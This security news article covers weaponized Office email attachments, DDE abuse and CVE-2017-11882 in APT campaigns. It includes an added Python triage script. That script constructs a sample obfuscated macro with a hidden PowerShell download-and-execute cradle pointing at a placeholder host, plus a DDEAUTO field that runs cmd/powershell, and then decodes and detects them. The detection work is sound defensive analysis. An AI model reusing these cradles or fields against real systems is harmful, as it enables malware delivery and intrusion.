
Weaponized emails are top APTs infection vector in today malware landscape


Yoroi-Cybaze: the top infection vector for cybercrime and state-sponsored hackers in today's malware landscape is the weaponized Microsoft Office document delivered via email

The top infection vector for both cybercriminals and state-sponsored actors in today's malware landscape is the weaponized Microsoft Office document delivered via email. Close behind are two techniques that need no macro at all: abuse of the Microsoft DDE (Dynamic Data Exchange) protocol and exploitation of CVE-2017-11882, the memory corruption vulnerability in the Office Equation Editor component. This is the conclusion of the Yoroi-Cybaze cyber security experts, who analyzed samples from recent attacks using these techniques. The reason for cybercrime's "love" of weaponized email is simple. Macro malware rarely needs an expensive-to-deploy 0-day exploit, and it often bypasses endpoint security solutions (macros are frequently whitelisted in enterprise environments) thanks to multi-layered obfuscation, mostly of the PowerShell stages the macro launches; broadly speaking, the barrier to entry is very low. Furthermore, APT Office documents with macros rely on simple social-engineering lures, such as a banner asking the user to "Enable Content", to get the macros enabled.
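To make the macro-to-PowerShell chain described above concrete, here is an added triage example; it is not code from the original page or from Yoroi-Cybaze. It runs over a constructed macro (in the shape of olevba output): it peels the string-concatenation and Chr() obfuscation layers, flags the auto-exec entry point and the shell launcher, decodes the -EncodedCommand argument (base64 over UTF-16LE) to expose the second-stage download cradle, and separately finds a DDEAUTO field in constructed document.xml text. The macro text, the DDE field, the stage-two URL on the reserved example.invalid domain, and all function names are assumptions made for illustration.

```python
"""Triage a weaponized Office macro and a DDE field.

Added example, not code from the original page or from Yoroi-Cybaze.
All sample inputs below are constructed for illustration.
"""
import base64
import re

# Constructed second stage the encoded command would launch. "example.invalid"
# is a reserved TLD, so the cradle never resolves to a real host.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1')"

# powershell -EncodedCommand takes base64 over UTF-16LE text, not UTF-8.
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")

# Constructed macro text in the shape of olevba output: an auto-exec entry point,
# string literals split with & and Chr() to hide the launcher, and an encoded
# PowerShell command line.
SAMPLE_VBA = (
    "Sub AutoOpen()\n"
    "    Dim o As Object\n"
    '    Set o = CreateObject("WScr" & "ipt.Sh" & "ell")\n'
    '    o.Run "pow" & "ersh" & "ell.exe -NoP -W Hidden -Enc" & Chr(32) & "'
    + ENCODED + '", 0\n'
    "End Sub\n"
)

# Constructed DDE field as it would sit inside word/document.xml of a .docx.
SAMPLE_FIELD = (
    "<w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "
    '"/k powershell -w hidden -c calc"</w:instrText>'
)

AUTOEXEC = re.compile(
    r"\bSub\s+(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Workbook_Open)\b", re.I)
LAUNCHERS = re.compile(
    r"(WScript\.Shell|Shell\.Application|powershell(?:\.exe)?|cmd(?:\.exe)?|mshta|rundll32)", re.I)
# Any of the abbreviations PowerShell accepts for -EncodedCommand.
ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DDE_FIELD = re.compile(r"\bDDE(?:AUTO)?\b\s+(.+?)(?:</w:instrText>|$)", re.I | re.M)


def flatten_vba_strings(vba: str) -> str:
    """Undo two cheap obfuscation layers: Chr(n) literals and "a" & "b" concatenation."""
    out = re.sub(r"Chr\((\d+)\)", lambda m: '"' + chr(int(m.group(1))) + '"', vba)
    return re.sub(r'"\s*&\s*"', "", out)


def decode_encoded_commands(text: str) -> list[str]:
    """Decode every -EncodedCommand argument found in text; skip blobs that do not decode."""
    decoded = []
    for blob in ENC_ARG.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def triage_macro(vba: str) -> dict:
    """Return the auto-exec triggers, launchers and decoded PowerShell found in a macro."""
    flat = flatten_vba_strings(vba)
    return {
        "autoexec": sorted({m.group(1) for m in AUTOEXEC.finditer(flat)}),
        "launchers": sorted({m.group(1).lower() for m in LAUNCHERS.finditer(flat)}),
        "decoded_powershell": decode_encoded_commands(flat),
    }


def find_dde_fields(document_xml: str) -> list[str]:
    """Return the command part of every DDE/DDEAUTO field in document.xml text."""
    return [m.group(1).strip() for m in DDE_FIELD.finditer(document_xml)]


if __name__ == "__main__":
    print(triage_macro(SAMPLE_VBA))
    print(find_dde_fields(SAMPLE_FIELD))
```

Two caveats when applying this to real samples: macros usually spread the encoded blob over many variables, functions and Replace() calls, so the string flattening here is only the first layer and the decoded PowerShell should be fed back through the same pass because operators nest -Enc inside -Enc; and a .docx frequently splits a DDE field across several <w:instrText> runs, so concatenate the runs of a field before matching.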

The cyber security experts: several APTs today use spear-phishing mail with a weaponized Office document as the attachment

According to Yoroi, several APTs today use spear-phishing mail with a weaponized Office document as the attachment. To name a few: the OilRig APT used BONDUPDATER in a campaign, discovered by FireEye, that in 2017 targeted a Middle Eastern governmental organization with a malicious VBA macro that downloads a two-stage PowerShell payload. A similar vector was used in a recent APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE). The attackers used no zero-day vulnerabilities in this campaign; instead they relied on weaponized Office documents containing VBA scripts that delivered a new variant of Seduploader. The Turla APT also used weaponized documents in its recent campaigns to deliver KopiLuwak, a heavily obfuscated JavaScript payload. These samples show a high level of obfuscation to defeat antivirus and use no exploit at all.
